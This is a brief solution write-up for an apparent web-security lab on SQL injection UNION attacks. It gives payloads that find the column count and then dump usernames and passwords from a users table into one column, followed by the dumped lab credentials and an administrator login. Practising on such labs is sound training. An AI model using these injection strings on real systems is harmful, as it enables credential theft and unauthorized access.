SQL injection UNION attack, retrieving multiple va

SQL injection UNION attack, retrieving multiple values in a single column

Solution

List how many column database has

' UNION SELECT NULL,NULL--

List all users and password from table users

administrator - qr1kz5tpkkhubhdvqng4
wiener - 7hao0o8mq0f9fv6wnndg
carlos - 9j2uwoquzvvrconbw8ir

' UNION SELECT NULL,CONCAT(username,' - ',password) FROM users--

Login as user: administrator

L: administrator
P: qr1kz5tpkkhubhdvqng4